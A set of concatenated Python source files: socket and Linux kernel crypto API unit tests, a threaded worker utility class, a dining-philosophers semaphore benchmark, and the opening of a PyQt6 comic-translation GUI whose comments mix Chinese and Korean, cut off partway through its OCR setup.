meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
thread_function.py
|
# coding=utf-8
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A utility class to run a function in a separate daemon thread."""
import abc
import enum
import queue
import threading
from typing import Optional
from absl import logging
class ThreadFunction(metaclass=abc.ABCMeta):
"""Base class that encapsulates long-lived functions in a separate thread."""
class Signal(enum.IntEnum):
"""Defines commands we can use to communicate with the internal thread."""
# The thread should be stopped to allow for graceful termination.
KILL = 1
def __init__(self, block_input: bool, block_output: bool, name: str):
"""Initializes this ThreadFunction.
Args:
block_input: Whether to block this thread when reading its input queue.
block_output: Whether to block this thread when writing to its
output queue.
name: Name of the thread. Used to keep track of threads in logging.
"""
self._block_input = block_input
self._block_output = block_output
self._name = name
self._input_queue = queue.Queue()
self._output_queue = queue.Queue()
self._should_run = True
self._internal_thread = threading.Thread(target=self._run)
self._internal_thread.daemon = True
self._internal_thread.start()
def read(self, block: bool = True, timeout: Optional[float] = None):
"""'Public' method for clients to read values _from_ this thread.
Args:
block: Whether the client should block.
timeout: Timeout for getting output from the queue, in seconds.
Returns:
The value produced by the underlying thread.
"""
try:
return self._output_queue.get(block=block, timeout=timeout)
except queue.Empty:
return None
def write(self, value, block: bool = True, timeout: Optional[float] = None):
"""'Public' method for clients to write values _to_ this thread.
Args:
value: The value to send to the underlying thread.
block: Whether the client should block.
timeout: Timeout for setting input in the queue, in seconds.
Returns:
The value produced by the underlying thread.
"""
self._input_queue.put(value, block=block, timeout=timeout)
@abc.abstractmethod
def main(self):
"""main() function that subclasses need to override."""
pass
def kill(self):
"""Shorthand for clients to terminate this thread."""
logging.info('Killing %s thread', self._name)
# Sending a kill signal to clean up blocked read_values.
self.write(ThreadFunction.Signal.KILL, block=True)
# Stopping the _run loop.
self._should_run = False
def _run(self):
"""'Private' method that reruns main() until explicit termination."""
logging.info('Starting %s thread.', self._name)
while self._should_run:
self.main()
logging.info('Finished %s thread.', self._name)
def _read_value(self):
"""'Protected' method for subclasses to read values from their input."""
try:
return self._input_queue.get(block=self._block_input)
except queue.Empty:
pass # Ignore empty queues. Keep going.
def _write_value(self, value):
"""'Protected' method for subclasses to write values to their output."""
self._output_queue.put(value, block=self._block_output)
|
3_philosophers.py
|
from threading import Semaphore, Thread
from time import sleep
from timeit import Timer
import random
rand = random.Random()
rand.seed(100)
#num of philosopher
num_p = 20
# num of meal/philosopher
r =100
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#Tanenbaum left philosopher function
def t_left(i):
return (i+num_p-1)%num_p
#footman and lefthand left function
def left(i):
return i
def right(i):
return (i+1)%num_p
def thinking():
sleep(rand.random()/10)
#sleep(0.00001)
#sleep(rand.random()/10)
def eating():
#print("philosopher " + str(i) + " is eating")
sleep(rand.random()/10)
#sleep(rand.random())
#sleep(rand.random()/10)
#############footman################
footman = Semaphore(num_p-1)
footman_forks =[Semaphore(1) for i in range(num_p)]
def footman_totime():
ts = [Thread(target=footman_come, args=[i,footman_forks]) for i in range(num_p)]
#print('****')
for t in ts: t.start()
for t in ts: t.join()
def footman_get_fork(i,footman_forks):
footman.acquire()
#print("philosopher " + str(i) + " comes")
footman_forks[right(i)].acquire()
footman_forks[left(i)].acquire()
eating()
def footman_put_fork(i,footman_forks):
footman_forks[right(i)].release()
footman_forks[left(i)].release()
footman.release()
#print("philosopher " + str(i) + " has done his meal")
thinking()
def footman_come(i,footman_forks):
for j in range (0,r):
footman_get_fork(i,footman_forks)
footman_put_fork(i,footman_forks)
#print("fottman -- p "+str(i)+ " round: " + str(j))
#############footman################
#############left_hand solution################
left_hand_forks =[Semaphore(1) for i in range(num_p)]
temp = random.randint(0, num_p-1)
def left_hand_totime():
ts = [Thread(target=left_hand, args=[i,left_hand_forks]) for i in range(num_p)]
for t in ts: t.start()
for t in ts: t.join()
def left_hand(i,left_hand_forks):
#print("*******temp: " + str(temp) + " ********")
for j in range (0,r):
if(i == 1):
#print("1111 get fork left : " + str(i))
left_hand_forks[left(i)].acquire()
#print("1111 get fork left : " + str(right(i)))
left_hand_forks[right(i)].acquire()
else:
#print("right 3333: " + str(right(i)) )
left_hand_forks[right(i)].acquire()
#print("left 555555; " + str(i))
left_hand_forks[left(i)].acquire()
eating()
left_hand_forks[right(i)].release()
left_hand_forks[left(i)].release()
thinking()
#print("left_hand -- p "+str(i)+ " round: " + str(j))
#############left_hand solution################
#############Tanenbaum's solution################
Tanenbaum_forks =[Semaphore(0) for i in range(num_p)]
t_mutex =Semaphore(1)
state=['thinking']*num_p
#store how many meal philosopher has eaten
count=[0]*num_p
def Tanenbaum_totime():
ts = [Thread(target=Tanenbaum, args=[i,Tanenbaum_forks,state]) for i in range(num_p)]
for t in ts: t.start()
for t in ts: t.join()
def test(i):
if state[i] == 'hungry' and state[t_left(i)] != 'eating' and state[right(i)] != 'eating':
#I only consider one situation, num of meals for current philosopher has eaten is
# not larger than num of meals for his left or right philosopher
if count[t_left(i)] - count[i] >= 0 and count[right(i)] - count[i] >= 0:
state[i] = 'eating'
print(i)
count[i]+=1
Tanenbaum_forks[i].release()
def t_get_fork(i):
t_mutex.acquire()
state[i]='hungry'
test(i)
t_mutex.release()
Tanenbaum_forks[i].acquire()
def t_put_fork(i):
t_mutex.acquire()
state[i] ='thinking'
test(right(i))
test(t_left(i))
t_mutex.release()
def Tanenbaum(i,Tanenbaum_forks,state):
for j in range (0,r):
t_get_fork(i)
eating()
t_put_fork(i)
thinking()
#############Tanenbaum's solution################
def main():
#--------footman------
timer1 = Timer(footman_totime)
print("1. Footman solution---Time: {:0.3f}s".format(timer1.timeit(10)/10))
#--------footman------
#print("aaaaaaaaaa")
#--------left_hand solution------
timer2 = Timer(left_hand_totime)
print("2. left_hand solution ---Time: {:0.3f}s".format(timer2.timeit(10)/10))
#--------left_hand solution------
#--------Tanenbaum's solution------
timer3 = Timer(Tanenbaum_totime)
print("3. Tanenbaum solution ---Time: {:0.3f}s".format(timer3.timeit(10)/10))
#--------Tanenbaum's solution------
#for c in range(0,num_p):
#thread = Thread(target=footman_come,args=(c,footman_forks))
#thread.start()
#sleep(rand.random())
if __name__ == "__main__":
main()
|
main.py
|
import glob
import os
import shutil
import sys
import threading
import time
import configparser
import eventlet
from tkinter import messagebox, Tk, filedialog, colorchooser
import cv2
import numpy as np
from PIL import Image
from PyQt6 import QtWidgets, QtCore, QtGui
from translate import translate, change_translate_mod
from covermaker import conf, render
from inpainting import Inpainting
from interface import Ui_MainWindow
from characterStyle import Ui_Dialog as CharacterStyleDialog
from textblockdetector import dispatch as textblockdetector
from utils import compute_iou
# tkinter弹窗初始化
root = Tk()
root.withdraw()
# 超时跳出
eventlet.monkey_patch()
# 重定向控制台信号
class Shell(QtCore.QObject):
newText = QtCore.pyqtSignal(str)
def write(self, text):
self.newText.emit(str(text))
# 程序参数
class var:
img_language = 'ja' # 原始语言
word_language = 'zh-CN' # 翻译语言
word_way = 0 # 文字输出方向
word_conf = conf.Section() # 文字渲染参数
word_mod = 'auto' # 文字定位모드
img_re_bool = True # 图像修复开关
img_re_mod = 1 # 图像修复모드
# 运行中的缓存文件
class memory():
model = None # 模型
img_show = None # 显示的图像
img_mark = None # 文字掩码
img_mark_more = None # 文字掩码2
img_repair = None # 修复后的图像
img_textlines = [] # 掩码box
textline_box = [] # 范围内的box
img_in = None # 输入图像
img_out = None # 输出图像
task_out = '' # 导出的目录
task_name = [] # 文件名
task_img = [] # 图片原文件
action_save_num = 0 # 行为记录
action_save_img = [] # 存档
range_choice = [0, 0, 0, 0] # 当前选中的范围
# 运行状态
class state():
mod_ready = False # 模型状态
action_running = False # 运行状态
text_running = False # 是否是文字输出
img_half = False # 当前图片缩小一半
task_num = 0 # 任务数量
task_end = 0 # 完成数量
ttsing = False # 语音输出锁(未使用多线程)
# 主程序
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.setWindowIcon(QtGui.QIcon('ico.png'))
self.ui.setupUi(self)
self.var = var()
self.state = state()
self.memory = memory()
sys.stdout = Shell(newText=self.shelltext) # 下面将输出重定向到textEdit中
print('여기는 콘솔입니다')
self.uireadly() # 初始化按钮槽
self.thredstart() # 开始线程
def mouseMoveEvent(self, e: QtGui.QMouseEvent): # 重写移动事件
if self._tracking:
self._endPos = e.globalPosition().toPoint() - self._startPos
self.move(self._winPos + self._endPos)
def mousePressEvent(self, e: QtGui.QMouseEvent):
if e.button() == QtCore.Qt.MouseButton.LeftButton:
self._winPos = self.pos()
self._startPos = QtCore.QPoint(e.globalPosition().toPoint())
self._tracking = True
def mouseReleaseEvent(self, e: QtGui.QMouseEvent):
if e.button() == QtCore.Qt.MouseButton.LeftButton:
self._tracking = False
self._startPos = None
self._endPos = None
# 读取图像,解决imread不能读取中文路径的问题
def cv2_imread(self, path):
img = Image.open(path)
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
return img
# 控制台输出到text
def shelltext(self, text):
if text!='\n':
self.ui.textEdit_3.append(text)
self.ui.textEdit_3.moveCursor(QtGui.QTextCursor.MoveOperation.End)
# 槽
def uireadly(self):
self.ui.action1.triggered.connect(
lambda event: QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://sljly.xyz/')))
self.ui.action2.triggered.connect(
lambda event: QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://github.com/jtl1207/comic-translation/')))
# self.ui.action3.triggered.connect(lambda event: print('1111'))
self.ui.actionja.triggered.connect(lambda event: self.change_mod('ja'))
self.ui.actionen.triggered.connect(lambda event: self.change_mod('en'))
self.ui.actionko.triggered.connect(lambda event: self.change_mod('ko'))
self.ui.actioncn.triggered.connect(lambda event: self.change_out_language('cn'))
self.ui.actionen_2.triggered.connect(lambda event: self.change_out_language('en'))
self.ui.actionKorean.triggered.connect(lambda event: self.change_out_language('ko'))
self.ui.actionin_imgs.triggered.connect(lambda event: self.change_img(True))
self.ui.actionin_img.triggered.connect(lambda event: self.change_img(False))
# self.actionfont = QtWidgets.QWidgetAction(self.menuBar)
# self.actionfont.setObjectName('actionfont')
# self.actionfont.setText("导入字体")
# self.menuBar.addAction(self.actionfont)
self.ui.actionfont.triggered.connect(lambda event: self.change_font())
self.ui.pushButton_2.clicked.connect(lambda event: self.change_word_way())
self.ui.pushButton_13.clicked.connect(lambda event: self.change_word_mod())
self.ui.pushButton_16.clicked.connect(lambda event: self.new_character_style_window())
self.ui.pushButton_8.clicked.connect(lambda event: self.change_img_re())
self.ui.pushButton_11.clicked.connect(lambda event: self.change_img_mod())
self.ui.pushButton_4.clicked.connect(lambda event: self.translation_img())
self.ui.pushButton_14.clicked.connect(lambda event: self.text_add())
self.ui.pushButton_12.clicked.connect(lambda event: self.text_clean())
self.ui.pushButton_9.clicked.connect(lambda event: self.auto_text_clean())
self.ui.pushButton_10.clicked.connect(lambda event: self.auto_translation())
self.ui.pushButton_7.clicked.connect(lambda event: self.cancel())
self.ui.pushButton_6.clicked.connect(lambda event: self.save())
self.ui.pushButton.clicked.connect(lambda event: self.tts())
self.ui.pushButton_3.clicked.connect(lambda event: self.change_translate_mod())
self.ui.pushButton_5.clicked.connect(lambda event: self.doit())
self.ui.pushButton_15.clicked.connect(lambda event: self.closeit())
# 其他线程
def thredstart(self):
QtCore.QTimer.singleShot(500, self.config_read)
QtCore.QTimer.singleShot(1000, self.thred_cuda)
QtCore.QTimer.singleShot(1500, self.thread_net)
# 检测cuda状态
def thred_cuda(self):
try:
import paddle
if paddle.device.get_device() == 'cpu':
print('paddle:cuda예외,cpu모드')
self.ui.label_10.setText('cpu')
elif paddle.device.get_device() == 'gpu:0':
print(f'paddle:cuda보통')
except:
print('Error:paddle예외')
self.ui.label_10.setText('예외')
try:
import torch
if torch.cuda.is_available():
print("pytorch:cuda보통")
else:
print("pytorch:cuda예외,cpu모드")
self.ui.label_10.setText('cpu')
except:
print('Error:pytorch예외')
self.ui.label_10.setText('예외')
try:
import tensorflow as tf
if tf.config.list_physical_devices('GPU'):
print("tensorflow:cuda보통")
else:
print("tensorflow:cuda예외,cpu모드")
self.ui.label_10.setText('cpu')
except:
print('Error:tensorflow예외')
self.ui.label_10.setText('예외')
if self.ui.label_10.text() == '检测中':
self.ui.label_10.setText('보통')
# 检测网络状态
def thread_net(self):
t = time.time()
try:
with eventlet.Timeout(20, False):
text = translate("hello", "zh-CN", "auto", in_mod=3)
if text != '你好':
print('google번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
else:
print(f'google번역:네트워크 정상,ping:{(time.time() - t) * 1000:.0f}ms')
except:
print('google번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
t = time.time()
try:
with eventlet.Timeout(20, False):
text = translate("hello", "zh-CN", "auto", in_mod=1)
if text != '你好':
print('deepl번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
else:
print(f'deepl번역:네트워크 정상,ping:{(time.time() - t) * 1000:.0f}ms')
except:
print('deepl번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
from gtts.tts import gTTS
import pyglet
try:
tts = gTTS(text='お兄ちゃん大好き', lang='ja')
filename = 'temp.mp3'
tts.save(filename)
music = pyglet.media.load(filename, streaming=False)
music.play()
time.sleep(music.duration)
os.remove(filename)
print(f'TTS:네트워크 정상')
except:
print('TTS:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
# 切换语言
def change_mod(self, language):
self.ui.actionja.setChecked(False)
self.ui.actionen.setChecked(False)
self.ui.actionko.setChecked(False)
if language == 'ja':
thread_language = threading.Thread(target=self.thread_language('ja'))
elif language == 'en':
thread_language = threading.Thread(target=self.thread_language('en'))
elif language == 'ko':
thread_language = threading.Thread(target=self.thread_language('ko'))
thread_language.setDaemon(True)
thread_language.start()
print(f'Info:탐지 언어 전환{language}')
self.config_save('img_language', language)
def thread_language(self, language):
self.state.mod_ready = False
self.ui.label_4.setText('로드되지 않음')
if language == 'ja':
from manga_ocr.ocr import MangaOcr
self.memory.model = MangaOcr()
self.ui.actionja.setChecked(True)
elif language == 'en':
import paddleocr
self.memory.model = paddleocr.PaddleOCR(
show_log=False, # 禁用日志
use_gpu=True, # 使用gpu
cls=False, # 角度分类
det_limit_side_len=320, # 检测算法前向时图片长边的最大尺寸,
det_limit_type='max', # 限制输入图片的大小,可选参数为limit_type[max, min] 一般设置为 32 的倍数,如 960。
ir_optim=False,
use_fp16=False, # 16位半精度
use_tensorrt=False, # 使用张量
gpu_mem=6000, # 初始化占用的GPU内存大小
cpu_threads=20,
enable_mkldnn=True, # 是否선택mkldnn
max_batch_size=512, # 图片尺寸最大大小
cls_model_dir='paddleocr/model/cls',
# cls模型位置
# image_dir="", # 通过命令行调用时间执行预测的图片或文件夹路径
det_algorithm='DB', # 使用的检测算法类型DB/EAST
det_model_dir='paddleocr/model/det/det_infer',
# 检测模型所在文件夹。传参方式有两种,1. None: 自动下载内置模型到 ~/.paddleocr/det;2.自己转换好的inference模型路径,模型路径下必须包含model和params文件
# DB(还有east,SAST)
det_db_thresh=0.3, # DB模型输出预测图的二值化阈值
det_db_box_thresh=0.6, # DB模型输出框的阈值,低于此值的预测框会被丢弃
det_db_unclip_ratio=1.3, # DB模型输出框扩大的比例
use_dilation=True, # 缩放图片
det_db_score_mode="fast", # 计算分数모드,fast对应原始的rectangle方式,slow对应polygon方式。
# 文本识别器的参数
rec_algorithm='CRNN', # 使用的识别算法类型
rec_model_dir='paddleocr/model/rec/ch_rec_infer',
# 识别模型所在文件夹。传承那方式有两种,1. None: 自动下载内置模型到 ~/.paddleocr/rec;2.自己转换好的inference模型路径,模型路径下必须包含model和params文件
# rec_image_shape="3,32,320", # 识别算法的输入图片尺寸
# cls_batch_num=36, #
# cls_thresh=0.9, #
lang='ch', # 语言(这个用的是中英模型)
det=True, # 检测文字位置
rec=True, # 识别文字内容
use_angle_cls=False, # 识别竖排文字
rec_batch_num=36, # 进行识别时,同时前向的图片数
max_text_length=30, # 识别算法能识别的最大文字长度
# rec_char_dict_path='', # 识别模型字典路径,当rec_model_dir使用方自己模型时需要
use_space_char=True, # 是否识别空格
)
self.ui.actionen.setChecked(True)
elif language == 'ko':
import paddleocr
self.memory.model = paddleocr.PaddleOCR(
# show_log=False, #禁用日志
use_gpu=True, # 使用gpu
cls=False, # 角度分类
det_limit_side_len=320, # 检测算法前向时图片长边的最大尺寸,
